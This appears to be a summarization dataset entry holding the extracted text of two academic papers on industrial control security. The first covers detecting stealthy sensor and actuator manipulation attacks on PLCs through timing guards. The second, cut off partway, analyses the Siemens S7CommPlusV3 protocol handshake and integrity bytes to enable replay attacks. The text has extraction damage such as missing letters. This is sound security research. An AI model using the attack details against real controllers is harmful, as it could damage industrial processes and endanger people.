Based on prior knowledge about the attack models, a robust supervisor is designed. In [5] an attack capability is presented in which an attacker can manipulate the sensor signals. In addition, a robust supervisor is designed against these attacks. [6] and [7] investigate the design of stealthy attack strategies. The authors are with Institute of Automatic Control, University of Kaiserslautern, Erwin-Schroedinger Str. 12, 67653 Kaiserslautern, Germany fritzr@eit.uni-kl.de; patrick-schwarz@gmx.de; pzhang@eit.uni-kl.deA major problem of many existing detection algorithms for discrete event systems is the fact that only the supervisory control layer is considered and the assumption that a potential attacker can only manipulate part of the sensor and actuator signals. In a realistic scenario, once an attacker has intruded in a network, it can be assumed that they have full access to all information transmitted over the network. Accurate and error-free production processes are of great importance in the industry. Even a slight change in the process can lead to considerable damage. Through targeted manipulation of the ICS, the execution of individual work steps can be performed incorrectly or not performed at all. As will be shown later in the two attack scenarios, it is possible to inject false information or perform additional malicious actions. Such manipulations usually result in a logical and temporal change of the production process. In a previous study, the authors presented the modeling of two deception attacks, the replay attack and the covert attack, on Cyber-Physical Systems with controllers based on signal interpreted Petri nets (SIPN) [8]. Furthermore, an attack detection scheme based on permutation of the transmitted signals was proposed. In comparison to [8], the approach proposed in this paper does not require an active component in the control loop, since the time guard detection scheme only passively monitors the communication. Also only an identi cation of the time guards is required here and the Petri net structure of the detection unit can be directly adopted from the SIPN controller, while [8] required an identi cation of the closed-loop behavior of the system for the detection. This paper introduces the detection method called time guard detection. The considered attacks can hide manipula- tions on the logical level of the PLC, but are visible and detectable on the temporal level. The main contributions are: Attack models for two deception attacks on ICS modeled as SIPN are proposed. The cyber attacks are false data injection and malicious action injection. A detection method called time guard detection is proposed. The method allows detection of targeted manipulations on the ICS, which results in a temporal change of the production process. The application of the time guard detection is possible for systems where all sensors and actuator channels or only part of them are vulnerable to attacks, i.e. can be observed and changed. II. PRELIMINARIES This section provides the necessary notations and de ni- tions that will be used later based [9] and [10].2019 18th European Control Conference (ECC) Napoli, Italy, June 25-28, 2019 978-3-907144-00-8 2019 EUCA 4368 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:52 UTC from IEEE Xplore. Restrictions apply. A Petri net can be represented by the four-tuple PN= (P;T;N+;N ), with a set of mplaces P=fp1;p2;:::; pmg and a set of ntransition T=ft1;t2;:::;tng. The post-incidence matrix N+(pre-incidence matrix N ) specify the arcs and their weights from transitions to places (from places to transitions). The (mn)matrix N=N+ N is the incidence matrix describing the system behavior and N(;t)is the column corresponding to a t2T. The set of pre places of a transition t2Tist=fp2PjN (p;t)>0gand the set of post places is t=fp2PjN+(p;t)>0gwithjtjandjtjas the number of pre places and post places. A transition t2Tcan re at marking M(k), only if the enabling condition N q(k)M(k)is ful lled. Transition tis represented by the n-dimensional ring vector q(k) =q1(k)q2(k) qjTj(k)T, whose j-th entry qj(k)is1, while all other entries are 0. The new marking M(k+1), resulting from ring t2Tat time instant kis determined by the Petri net state equation M(k+1) =M(k)+Nq(k). A Signal interpreted Petri Net (SIPN) is described by SIPN = (PN;M0;I;O;j;w;W)with PNas an ordinary Petri net, I=Oas a set of binary input/output signals, jas a mapping associating every transition t2Twith a ring condition j(t) =boolean function in I,was a mapping associating every place p2Pwith an output w(p)2f0;1; g, where (-) denotes don t care and Was the output matrix. The extended ring rules for SIPNs are [9]: 1)At2Tis enabled, if all its pre places are marked and all its post places are unmarked. 2)At2T res immediately, if it is enabled and j(t) =1. 3) All reable transitions re simultaneously. 4) The ring process is iterated until a stable marking is reached, i.e. until no transition can re anymore. 5)After a stable marking is reached, the output signals are recalculated by applying Wto the marking. The output matrix Wis ajOjmmatrix wherejOjis the number of output signals and Y(k)as the resulting output signal combination. The SIPN behavior can be described by M(k+1) =M(k)+Nq(k) Y(k) =WM(k)(1) with q(k)determined by the ring rules shown above. In order to allow a time delay of the ring condition j(t) for every transition t2T, the SIPN must be extended and can be described by the time-based SIPN = (SIPN ; )with as a set of individual time values for each transition t2T, which describes the minimum time one of the pre placest must be marked ( 9p2t>0) before transition t can re. This results in the change of ring rule 1): 1)A transition t2Tis enabled, if all its pre places are marked after the corresponding time value of and all its post places are unmarked. The time of this transition is started if at least one of its pre places is marked. Through the use of input and output signals, SIPNs have a strong relationship to industrial languages according to the IEC 61131-3 standard and can thus be used in ICS. For further information on SIPN see [9]. NetworkPlant Attacker PLCIc OcI O Ia Oa Fig. 1: Structure of the attack model III. ATTACK MODEL We consider an ICS consisting of a plant and a PLC connected via network. All inputs and outputs are transmitted over this network. The sensor signals of the system are described by the input vector I= (I1:::Ir)Tand the actuator signals are described by the output vector O= (O1:::Os)T. The PLC controls the actuators of the plant based on the sensor data and is represented by SIPN c. The attacker pursues an attack goal and is represented by SIPN a. Subscript c denotes the controller and subscript adenotes the attacker. We assume that the network connection is unsafe and the attacker has read and write access to the data transmitted over the network. Furthermore, it is assumed that the attacker has extensive knowledge about the PLC and the process ow. By reading access of the input and output signals, the controller may be identi ed and with a state estimation, the current marking of the SIPN cmay be obtained by the attacker. The general model of the attacked system is shown in Fig. 1. The attack vectors are denoted by IaandOa. The input and output vectors of the system without attack are O=OcandIc=I. The manipulation of the attacker can be described by two binary diagonal matrices GIandGO, where the entries on the diagonal are 1 if the corresponding signal is vulnerable and 0 if it is not vulnerable. In general, during an attack the input vector Icof the PLC and the output vector Othat is transferred to the actuators can be described by Ic=GIIa+(Fr GI)I;O=GOOa+(Fs GO)Oc(2) withFr=Fsas identify matrices with dimension (rr)=(ss). If all sensors and actuator channels are vulnerable to attacks, GI=Fr,GO=Fsand (2) can be simpli ed to Ic=Ia;O=Oa. Due to the complexity of large production systems, it is more dif cult for the attacker to hide the manipulation. In this case, the attacker can choose to only manipulate part of I/Os at the same time to guarantee his invisibility, even if he has access to all I/Os. This means that very often only a speci c subsystem is attacked. In the following, the two attack scenarios, false data injection and malicious action injection, are presented. A. False Data Injection In false data injection attacks, the goal of an attacker is to manipulate the sensor measurements to induce a change in the state variables without being detected. In [11], two attack types are considered, called random false data injection and4369 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:52 UTC from IEEE Xplore. Restrictions apply. PLC Attacker Network 1 2 3 4 4 3 2 1 1 2 3 4 4 3 2 1 1 3 2 1 2 3 3 2 1 2 1 3 Fig. 2: SIPN model of False Data Injection targeted false data injection . Inrandom false data injection , the attacker tries to nd an attack vector (i.e. input vector) that injects arbitrary errors into the state variables. In targeted false data injection , the attacker has an attack goal and tries to nd a vector that injects speci c error behavior into the speci c state variables chosen by him, without being detected. In this section a targeted false data injection attack for DES modeled by SIPN is considered. With read access to the network, the attacker can track the behavior of the controller SIPN c. Now, in speci c markings chosen by the attacker, false data is injected into the input vector Ic. This is illustrated by an example in Fig. 2. The attacker starts observing the I/Os. As soon as the attacker has tracked the vector combination j1andw2, the transition ta1 res and the attack starts. With wa2the attacker injects false data in the input vector Icof the controller. The ring condition of transition t2is satis ed e.g. too early. The attacker could also maintain a certain signal combination for a longer time to achieve a delayed ring of this transition. The individual transitions of the attacker may have a time delay as an additional ring condition. After reaching the attack goal, the attacker returns to his idle state pa1with ta3 and waits again for the speci c I/O vector combination. In summary, by injecting false data in the input vector Ic, individual processes are executed longer or shorter. In addition, the attacker can also create unstable cycles, which completely skip some markings. In order to preserve the invisibility, the attack can only be used in certain parts of a process in which a targeted injection of false data does not affect the program execution on the logical level. Thus, the controller must be able to continue running normally after reaching the attack goal. From the PLC s point of view, this attack has no in uence on the process ow and thus can not be detected directly via the I/Os. The weak point of this attack is by injection of false data in the input vector Ic, the temporal behavior of the process ow changes and on the time level the attacker loses the invisibility and can be detected. B. Malicious Action Injection The malicious action injection attack uses the basic idea of a covert attack, described in [12] and [13], to change the PLC Attacker 1 2 3 4 4 3 2 1 1 2 3 4 4 3 2 1 1 2 3 3 2 1 Network 1 1 2 3 2 3 Plant Fig. 3: SIPN model of Malicious Action Injection actuator signals to achieve an attack goal and to hide the in uence of the attack on the sensor signals. In general, it is the goal of the attacker to perform additional or malicious actions during the runtime of the process without changing the program logic and preserving the invisibility on the logical level. This attack requires full access to the input and output signals and extensive knowledge about the program logic of the PLC, which is assumed as a normal SIPN. This attack is modeled as a normal (non time-based) SIPN and is represented by SIPN awith the behavior described by Ma(k+1) =Ma(k)+Naqa(k) Ya(k) =WaMa(k)(3) The attack consists of two separate phases: Phase 1 Synchronization: In this phase, the attacker synchronizes with the PLC by determining the ac- tive marking of SIPN cbased on the I/Os. Before the attack, i.e. k<k0with k0as the start time of the attack, the vectors can be assumed to Ic(k)=I(k), O(k)=Oc(k),Ia(k)=0andOa(k)=0. As soon as SIPN a has synchronized with SIPN cand the PLC has reached M(k)=Ma(k0), the attack is started. Phase 2 Attack: In this phase, the planned attack goal is executed for the period k0kka, where kade nes the end time of the attack. During the attack the I/O vectors can be assumed to Ic(k)=Ia(k)andO(k)=Oa(k). In speci c markings the attacker suppresses certain input signals and thus prevents the following transitions from becoming active. Therefore the vector Iacan be assumed to Ia(k)=I(k0 1)during the attack. Now some malicious actions will be executed. Once the attack goal is reached ( k=ka), the previously blocked transitions will be released and the process continues to run normally. Malicious action injection attacks are highly sophisticated and pose a serious threat to ICS. The attacks are particularly dangerous because they are not active all the time. They wait until the controller has reached a certain point in the program and then they become active. Some malicious actions are performed and then the attacker is inactive again. This is illustrated in an example in Figure 3.4370 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:52 UTC from IEEE Xplore. Restrictions apply. After synchronization, the attacker waits for the controller to reach the place p2. Subsequently, the attack is started. The attack phase is represented by the places pa1,pa2andpa3and the transitions ta1,ta2andta3. During the entire duration of the attack, the input vector of the controller is Ic(k) =I(k0 1) fork0kka. Thus, the attacker prevents the transition t2from becoming active. For the ring condition ja1,ja2 andja3, the input vector I(k)of the physical plant is used. With the outputs of the markings pa1,pa2andpa3, the output vector Oais set. This is transmitted to the plant and can be assumed to O(k) =Oa(k). After the attacker has reached the place pa3, the transition t2is released again and Ic(k) =I(k). As soon as the ring condition j2is ful lled, the attack is terminated and the normal process continues. Similar to the false data injection, the malicious action injection attack is completely stealthy on the logical level and can not be detected there. Although the plant executes additional actions during this attack, the de ned process ow in the PLC is not affected. Only on the time level the attacker loses the invisibility and can be detected. C. Loss of invisibility of attack on time level The attacker considered in this paper attacks the local network of the plant from outside, i.e. over the internet or from the cloud. That means the attacker has the problem of network delay and latency variation [14] depending on the distance to the attacked plant. This delay inhibits the correct identi cation of the time information of the system, while still allowing the correct identi cation on the logical level. During the attack phase, the attacker again has the problem of network delay. It is reasonable to assume that the attacker can not perfectly hide his attack on the time level. In a former study [15], an experimental setup with a Soft- PLC in the cloud (software PLC running on Amazon Elastic Compute Cloud) that communicates with an I/O interface at a laboratory system (in our case the S7-300 PLC from Siemens, see Section V) was examined. The resulting network delays ranged from 5ms to 4.59s. Thus the attack detection based on the time level is a realistic approach. IV. ATTACK DETECTION With the two attack scenario described above, a detection method called time guard detection can now be designed to exploit the weak point of these attacks. For the basic idea for this attack detection, we have been inspired by the approach of the fault detection and isolation based on timed automata described in [16]. There, an identi cation algorithm was used to determine a timed automaton model of the closed-loop system for fault diagnosis. Especially the timed model of a DES, which is de ned as a timed automaton with guards described in [17], can be used for the detection of cyber attacks instead of faults. This basic idea is adapted and used for the attack detection in DES based on SIPN. For the purpose of time guard detection, a new SIPN is de ned, i.e. SIPN d= (PN;M0;I;j;C; ;TG)with PN,M0,Iandjas de ned in Section II Cas a set of clocks. as a mapping associating every transition t2Twith timing information (t)2f min; max; timeoutg TGas a set of time guards. Symbols with subscript dare associated with the time guard detection. Since this detection method is related to the events and actions of SIPN cand to the timing information of the real plant, the basic structure of SIPN dis inherited from SIPN c, i.e.PN,M0,Iandjof SIPN dare identical to SIPN c. The set Cwith cardinalityjCj=jTjcontains as many clocks as transitions. The function g:T!Cassigns a clock c2Cto a transition t2T, where g(t)addresses the clock cof the transition t. A clock interpretation fis de ned as f:C!R+, where f(c)represents the time value of the clock c. The starting condition of a clock c2Cis de ned as 9p2t>0 (4) which means that the clock cis started as soon as at least one pre place of tis marked. The set TG contains boolean conditions expressed as function of clocks. A time guard y2TGis denoted as y(t) = ( f(g(t)) (t)min)^(f(g(t)) (t)max)(5) where y(t) =True means that the thas red within the time interval and y(t) =False means that thas red too early or too late. The evaluation of the timing information by yis started by the condition (8p2t=1)^(8p2t=0)^(j(t) =True) (6) which means that the clock cis stopped and the timing information is evaluated by (5)as soon as all pre places are marked, all post places are unmarked and the ring condition j(t)of transition tis ful lled. The condition of whether an attack has occurred can be formulated as y(t) =True)nominal y(t) =False)attacked(7) Algorithm 1 represents the time guard detection algorithm that can be used for attack detection in ICS. This algorithm is event triggered and is called with every change in the input vector Ic. To switch the detection on during runtime of the PLC, SIPN cand SIPN dmust be synchronized. For this, SIPN c must reach a certain marking, e.g. the inital marking M0. As soon as the synchronization is completed, the clock g(t)is started once for all transitions Tinit=ft2Tj9p2t0>0g. A boolean variable stable is de ned, which is set to True before processing the transitions and checking condition (6). For each transition t2Twhich ful lls condition (6), the following steps are performed: The clock g(t)is stopped. The time guard y(t)is evaluated by (5). Considering (7), an alarm counter is incremented by 1. All pre places and post places of tare updated. The clock g(t)is reset. The boolean variable stable is set to False . Afterwards, the clocks g(t)of all following transitions Tnext=ft2Tj9p2t0>0gare started. This process is4371 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:52 UTC from IEEE Xplore. Restrictions apply. Algorithm 1: Time Guard Detection (event triggered) Input: New observed input vector Ic stable :=False ,AlarmCounter :=0 while stable =False do stable :=True Tactive :=ft2Tj((8p2t=1)^(8p2t=0) ^(j(t) =True)) = Trueg foreach t2Tactive do stop g(t) evaluate y(t)with (5) ify(t) =False then AlarmCounter :=AlarmCounter +1 8p2t:=0 ,8p2t:=1 reset g(t),stable :=False Tnext:=ft2Tj9p2t>0g foreach t2Tnextdostart g(t) ifAlarmCounter >0then DetectionAlarm :=True return DetectionAlarm Algorithm 2: Timeout alarm function (time triggered) TGtimeout :=ft2Tjf(g(t)) (t)timeoutg ifjTGtimeoutj>0then TOalarm :=True elseTOalarm :=False return Timeout alarm TOalarm repeated until a stable marking has been reached, i.e. stable = True .(6)ensures that the time of each red transition is evaluated, even if it is contained in an unstable cycle. At the end, DetectionAlarm is set to True ifAlarmCounter >0. Here, a detection alarm is activated if one time deviation occurs. This can result in a high false alarm rate. Thus, several of these time deviations are required to activate a detection alarm, then the last condition of Algorithm 1 must be adapted and extended by a residuum, i.e. (AlarmCounter >s)with sas the number of allowed time deviations. Algorithm 1 detects attacks based on the ring timing of the transitions. If an attacker blocks the ring of the transitions as shown in Section III for a longer time, Algorithm 1 will not detect the attack. In order to preserve the functionality of the attack detection, a third time timeout is introduced. Time timeout represents the maximum upper limit of the time value f(g(t)). Iftdoes not re within the given time, the following condition is true q(t) = ( f(g(t)) (t)timeout ) (8) Based on (8), Algorithm 2 checks if a t2Thas exceeded its time limit and returns a corresponding timeout alarm. Algorithm 2 is time triggered and thus independent from the ring of transitions. Remark 1: The times min, maxand timeout can be deter- mined from expert knowledge, from the records of a fault-free process ow or with identi cation methods [16]. V. EXPERIMENTAL SET-UP To analyze the effectiveness of both attacks and the time guard detection under real conditions, a lab system is used. Feeder Drilling station Horizontal milling stationStorage Vertical milling stationFig. 4: Lab system TABLE I: I/O of feeder, drill and vertical mill Input Description Output Description I0:6 feeder ready O0:5 feeder signal I0:7 feeder empty O0:6 feeder motor I1:2 top position O1:2 motor up I1:3 bottom position O1:3 motor down I1:4 workpiece at entrance O1:4 drilling motor I1:5 workpiece in position O1:5 conveyor on I2:2 top position O2:2 motor up I2:3 bottom position O2:3 motor down I2:4 workpiece at entrance O2:4 milling motor I2:5 workpiece in position O2:5 conveyor on I2:6 tool in position O2:6 tool change motor The system is shown in Figure 4, which was also used in [8] and [18]. The Plant is connected via 17 inputs and 17 outputs with the PLC, which are shown in Table I (I/Os of horizontal milling station are omitted due to space constraints). A production cycle includes the treatment of one or more workpieces. Each workpiece is drilled two times, processed with each of the three tools of the vertical mill (VMill), milled by the horizontal mill and nally transported to the storage. The controller has a total of 63 places and 85 transitions. A. False Data Injection We now assume the system is being attacked by a false data injection attack with the goal to terminate the drilling process early. For this scenario, Figure 2 can be considered. In this attack, only the I/Os of the drilling station are considered. The input vector can thus be described by I=Ic=Ia= [I0:6I0:7I1:2I1:3I1:4I1:5]Tand the output vector by O=Oc=Oa= [O0:5O0:6O1:2O1:3O1:4O1:5]T. The attacker looks for the input vector I= [1 0 1 0 0 1 ]T and the output vector Oc= [0 0 0 1 1 0 ]T, i.e. the workpiece is in position and the processing begins. As soon as this vector combination is tracked, the ring condition ja1is ful lled and the attack is started. The normal drilling process is completed as soon as the bottom position has been reached, i.e I1:3=1. This normally takes about 2.7s and the drill is moved up again afterwards. After 1.5s, the attacker injects vector Ic= [1 0 0 1 0 1 ]Twith wa2, which satis es this condition. At this time the drilling is not completed and the workpiece was processed incorrectly. In this example, the complete input vector Icwas manipulated. However, only the two inputs I1:2andI1:3were required for the attack. All other signals were not manipulated. As soon the attacker tracked the output vector Oc= [0 0 1 0 1 0 ]T,ta2 res and pa3becomes active. Now, the attacker has reached the attack goal and after a time- delayed ring of transition ta3the attacker returns to the initial marking pa1. The attacker waits again for the speci c I/O vector combination to start the next attack.4372 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:52 UTC from IEEE Xplore. Restrictions apply. 2={2.2 ;3 ;6 } ( ( 2))=1.5 ( ( 3))=2.1 3={1.8 ;2.5 ;5.5 } ( ( 1))=2.37 1={1.9 ;2.8 ;5.5 } 2 3 3 2 1 Fig. 5: Attack Detection B. Malicious Action Injection Next, we consider a malicious action injection attack on the tool change of the the VMill so that the workpiece is processed with the wrong tool. For this scenario, Figure 3 can be consid- ered. The I/O vectors are I=Ic=Ia=[I2:2I2:3I2:4I2:5I2:6]T andO=Oc=Oa=[O2:2O2:3O2:4O2:5O2:6]T. At rst we consider the tool change process without attack. It is started in p2. Here Oc= [0 0 0 0 1 ]Tis active. At this point there is still a tool in position ( I2:6=1). After the tool is no longer in position ( I2:6=0), the condition j2has been ful lled and p3is marked with Oc= [0 0 0 0 1 ]T. As soon as a new tool is in position ( I2:6=1), the condition j3is ful lled and p4is marked with Oc= [0 0 0 0 0 ]T. The tool change of the VMill is now completed. Now we assume an attack on the tool change process. The attacker will be active as soon as p2is marked. He will prevent the ring of transition t2during the complete attack with Ia= [1 0 0 1 1 ]T. The malicious actions of the attacker contain a modi ed tool change process. If these are additionally performed, then the wrong tool is used for processing the workpiece. In this example, the output vector of all three places of the attacker are identical ( Oa= [0 0 0 0 1 ]T). The ring conditions for the attacker SIPN are: ja1:I2:6=0, ja2:I2:6=1 and ja3:I2:6=0. As soon as pa3is marked and the condition of j2is ful lled, the attacker releases transition t2again and the process of VMill continues normally. In the end, the tool change process has been executed twice. C. Time Guard Detection Due to space constraints, we only present the time guard detection for the false data injection attack, which was described in Section V-A. The attacker injects a wrong input vector in transition t2to terminate the drilling process earlier. As a result, the condition f(g(t2)) (t2)minis not ful lled and the attacker can be detected. This is shown in Figure 5. The time value of the clock of transition t1has a value of 2:37seconds. This lies within 1:9sand2:8sand thus satis es condition (5)(y(t1) =1). For transition t2, however, a value of 1:5seconds was determined, which is below (t2)min=2:2s and can be detected by Algorithm 1. In the I/Os the attacks can hide their manipulation and therefore they are invisible. Only on the time level they lose their invisibility due to the nature of the attacks.VI. CONCLUSIONS In this paper the detection method called time guard detection has been presented. This is used to detect false data injection and malicious action injection attacks, which are modeled for ICS based on SIPN. Both are completely stealthy on the logical level of the PLC and cannot be detected. Only on the time level they can not hide their manipulations due to their nature and can be detected. For future research, we want to develop algorithms to differentiate between plant faults and cyber attacks. Another eld of research is the prevention and handling of cyber attacks, which is also of interest for legacy systems.
Summary:
Due to the rapid increase in digitalization and networking of systems, especially in industrial environments, the number of cyber-physical systems is increasing and thus the danger of possible attacks on such systems. As demonstrated in several recent examples, a cyber attack on an industrial control system (ICS) can have catastrophic consequences for humans and machines. This is due to the communication networks between programmable logic controllers (PLC), actuators and sensors, which are usually vulnerable to attacks, as well as various processes or devices that are not suf ciently protected. In this paper, two possible attacks on a discrete event system (DES) are introduced, in which a running process, controlled by a PLC, is manipulated without being detected. Furthermore, a detection method for such attacks is presented.
|
Summarize:
Index Terms S7 Protocol, SIMATIC PLCs, Cyber Security, Industrial Control Systems; Replay Attacks; I.INTRODUCTION The S7 Protocol serves the exchange of critical information between Programmable Logic Controllers (PLCs) and their Total Integrated Automation (TIA) Portal engineering soft- ware. The exchanged messages include network con guration, critical data e.g., the control logic program, diagnostic infor- mation, set-point values, etc. between the connected parties. Its core communication follows a "client-server" pattern. Meaning that, the TIA Portal device (client) initiates transactions, and the connected PLC (server) responds by either supplying the requested data or executing certain actions. The newer generations of S7 PLCs i.e., S7-1200 and S7-1500 are pro- vided with a cryptographically protected S7 protocol, called S7CommPlus. This protocol is identi ed by a unique protocol ID (0x72 ) and has three sub-versions [1] as follows: - S7CommPlusV1: it is used by the older versions of TIA Portal and only in S7-1200 PLCs. This protocol does not include any integrity protection. - S7CommPlusV2: it is used in the TIA Portal up to V12 and its PLCs S7-1500 rmware up to 1.5. This protocol is integrity protected and has security features against replay attacks (e.g., Hashed-based Message Authentication Code- Secure Hash Algorithm-256 (HMAC-SHA-256)).- S7CommPlusV3: it is used in the newer versions of TIA Portal i.e., from V13 on, and in the newer S7-1500 PLC rmwares e.g., V1.8, 2.0, etc. This protocol requires that both the TIA Portal and the PLCs to support the features of this protocol. Here, Siemens has improved the integrity mechanism by providing their S7CommPlus protocol with very complex encryption processes. Therefore, it is considered the most secure protocol among the other versions i.e., S7CommPlusV1 and S7CommPlusV2, and it is the focus of our work. The integrity mechanism implemented in the newest PLC models and the S7CommPlusV3 protocol consists of three main parts : 1) a Challenge packet sent from the PLC to the TIA Portal, 2) a Response packet sent from the TIA Portal to the PLC, and nally 3) an Integrity Part in each S7 function packet sent from the TIA Portal to the PLC and vice versa [1] [4]. In this work, we show how an attacker could get suf cient information of the integrity mechanism, and disclose vulnerabilities that he can exploit to maliciously craft S7 Function packets that could be potentially used in replay attacks. To validate our ndings, we perform several attack scenarios on a real hardware SIMATIC S7-1512SP PLC with a rmware V2.9.2, and a TIA Portal software with a rmware V16. The attacks presented in this work include a simple start/stop, unauthorized software and hardware changes to the PLC program, removing the PLC program and Denial of Service (DoS) attacks. All our attack scenarios are network- based and designed with the help of pre-recorded packets that can be used after calculating speci c encryption bytes correctly as shown later. The rest of the paper is organized as follows. We compare our work with related ones in section II. Section III gives an overview of the S7CommPlusV3 protocol while its commu- nication process is illustrated in IV. Section V presents our attack approach, and we conclude this paper in Section VI. II.RELATED WORK There are only a few researches that discussed vulnera- bilities and security gaps in the S7CommPlus protocol. The rst ever work was published in 2016 when Spenneberg et al. [5] introduced a worm that found new vulnerabilities in the S7CommPlus protocol, precisely the S7CommPlusV2. The authors demonstrated a malicious code designed with the help of TIA Portal. The code was rst injected into an S7-1200 PLC. After patching the PLC, the worm automatically scanned 978-1-7281-9023-5/21/$31.00 2021 IEEE2023 IEEE 19th International Conference on Factory Communication Systems (WFCS) | 978-1-6654-6432-1/23/$31.00 2023 IEEE | DOI: 10.1109/WFCS57264.2023.10144251 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:05 UTC from IEEE Xplore. Restrictions apply. the network and connected to other PLCs trying to download the binary code into them. The downside of Spenneberg ap- proach was that the infected PLC is always rebooted during the patch which could eventually pay the legitimate user attention. In 2017, Cheng et al. [4] investigated the new encryption method used in the S7CommPlus protocol. The authors used a reverse engineering technique to analyze the communication process between the PLC and TIA Portal. Afterwards, they presented a spear that can break the security wall of the S7CommPlus protocol that Siemens S7-1200 PLCs utilize. The authors performed two attacks. First they pushed crafted packets into the network to start and stop the PLC remotely. In the second attack scenario, the authors manipulated the input and output values of the victim causing a serious damage for the physical process. However, the work of Cheng lacks detailed information of how the integrity check mechanism works, how the encryption processes are calculated and which bytes can be manipulated by adversaries to conduct successful replay attacks. A research group in 2018, showed that a network based attack e.g., Address Resolution Protocol (ARP) poisoning is feasible in S7-1200 PLCs and their S7CommPlus protocol [6]. The authors found speci c 7 bytes, known as " S7- ACK ", can be exploited for a session stealing and DoS attacks. Biham et al. [1] investigated the security features of both S7CommPlusV2 and S7CommPlusV3 protocols used in both S7-1200 and S7-1500 PLCs. The authors disclosed serious security gaps in the S7CommPlus protocol and performed different exploits against cryptographically protected PLCs. In 2022, Alsabbagh et al. in [2], [3] investigated also the security of S7CommPlusV3 protocol and revealed a few security gaps in the design of this protocol e.g., one-way authentication method between the PLC and TIA Portal software allows attackers to connect to the victim PLC using a TIA Portal software without any efforts. Furthermore, the authors found that the PLC did not check the integrity of all packet attributes. Based on their ndings, the authors designed an injection tool, namely PLCinjector that allows attackers to establish a connection with a remote PLC and alter the program running in the device. All the aforementioned works [1] [4], [6] required from adversaries to have already a TIA Portal software installed on the attacker machines. In opposite, we in this work overcome this point by introducing typical replay attack scenarios based on pre-captured packets from old S7 sessions without the need to have a TIA Portal installed on the attacker s machine. Furthermore, our attacks are valid for all S7-1500 PLCs from the same rmware i.e., V2.9.2. III. S7C OMM PLUSV3 P ROTOCOL BACKGROUND The S7CommPlusV3 protocol supports various operations that are performed by the TIA Portal software such as start/stop the PLC, download/upload a control program to/from the PLC, read/write values of a control variable, etc [2]. All these operations are translated rst by the TIA Portal software to S7CommPlus packets, precisely S7 Function packets before they are transmitted to the PLC. Then, the PLC acts upon the messages it receives, executes the control operations, andresponds back to the TIA Portal accordingly. The messages are transmitted in context of a session, each has a session ID (chosen by the PLC) [2]. Since the S7CommPlus is a cryptographically-protected protocol, each new S7 session established using this protocol begins with a four-message handshake to select the cryptographic attributes of the session, including the protocol version and encryption keys [2]. After the handshake, all messages are integrity protected using a very complex integrity mechanism. A.Protocol Structure S7CommPlusV3 is a "request-response" protocol. Each message consists of a protocol Header ,Data and a Trailer as shown in gure 1. Fig. 1: The Structure of S7CommPlus Protocol The Header andTrailer have always the same structure including the following components: 1-byte Protocol version , 1-byte Protocol ID , and 2-byte DATA Length as shown in gure 2. Fig. 2: S7CommPlus Protocol: Header andTrailer have the same Structure The Protocol Data Unit (PDU) type determines the S7CommPlus protocol version i.e., V1, V2 or V3 for the value 0x01, 0x02, or 0x03 respectively. In case the PDU type has the value 0x01 or 0x02, this means there is no Integrity Part in the Data eld. In the opposite, an additional Integrity Part (see the red block in gure 3) is padded with the Data eld in case the PDU type is donated with 0x03 as shown in gure 3. In this work, we are only interested in studying the latest S7CommPlus version. Therefore from this point on, all the information provided throughout this paper is related to the S7CommPlusV3 protocol. The Data block is comprised of 14 bytes (see the green block in gure 3). Starting from the top, we see a 1-byte Opcode which identi es the purpose of the S7CommPlus packet e.g., 0x31 if the packet is a request, 0x32 if the packet is response or 0x33 if the packet is a noti cation. After the Opcode , we see a 2-byte eld that has a xed value of 0x0000 . Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:05 UTC from IEEE Xplore. Restrictions apply. Fig. 3: S7CommPlusV3 protocol - Data eld Components Then, there is a 2-byte eld, called Function , which determines the functionality of the packet e.g., 0x04ca forCreateObject , 0x0542 forSetMultiVariable ,0x04f2 forSetVariable , etc. In the next eld we nd again a xed value of 0x0000 followed by a 2-byte eld representing the sequence number of the packet. The Session ID length is 4-byte and has always the format of0x000003xx . The xxin the Session ID is a combination of ObjectID and0x80 . Finally, we have the transport ag that is a 1-byte eld generated randomly without any use neither in the encryption nor in the authentication methods. The structure and content of the Setblock (see the blue block in gure 3) are related to the PDU type and Opcode . This block has many diverse types and is quite complex. For more details please see the S7comm Wireshark dissector plugin project1. B.Communication Process The TIA Portal and PLCs exchange four kinds of packets: S7Request ,Challenge ,Response , and Function packets, see gure 4. Fig. 4: S7CommPlus Communication Process 1https://sourceforge.net/projects/s7commwireshark/As can be seen, at the beginning of each new communica- tion session, the TIA Portal sends an S7 Request to establish a connection with the PLC. After the PLC receives the S7 Request , it sends a 20-byte array, namely Challenge , that signi cantly differs from a session to another. Those 20 bytes are generated by a hash or pseudo random function. After the TIA Portal receives the Challenge , it generates a Response that contains among many bytes three interesting blocks: "block 1" is 9-byte array, "block 2" is 8-byte array and "block 3" is 132-byte array, see gure 7. The PLC examines the integrity of those blocks and sends a Transmission Control Protocol (TCP) message as well as a reset ag if the content of the blocks are different to what the PLC expects to receive, in other respects, establishing the S7 session keeps on by sending an " OK" packet to the TIA Portal. Those bytes are generated by speci c algorithms illustrated in Section IV. Once the communication session is approved by the PLC, all the following packets exchanged between the TIA Portal and PLC are protected with anIntegrity Part related to the functions provided by the TIA Portal. In the next section, we investigate this communication process in more detail. IV.INVESTIGATING THE COMMUNICATION PROCESS In order to understand the encryption algorithms used in the S7CommPlusV3 protocol and explore possible exploits, we need rst to analyze the communication process between the TIA Portal and PLC. To this end, a manual analysis was conducted using helpful tools such as Scapy2and WinDbg3, and a number of different communication sessions. First, we open the TIA Portal and press on the " go online " button then capture all the packets and save them in a pcap le for a further analysis. To support our study, we use the WinDbg software that allows us to make several breakpoints during the communication session that is comprised of four packets 2https://scapy.net/ 3https://windbg.org/ Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:05 UTC from IEEE Xplore. Restrictions apply. (see gure 4). In the following we present our analysis results for each packet in detail. A.S7 Request Packet The TIA Portal initializes a new session by sending a Request packet to the PLC. This packet has no encryption bytes, therefore an attacker can re-use this packet "as-is" without any appropriate adjustments. B.S7 Challenge Packet After the PLC receives the S7 Request from the TIA Portal, it responds by sending an S7 packet (we call it S7 Challenge ). Our investigation showed that this packet has a 20-byte array that varies signi cantly every time the TIA Portal sends a 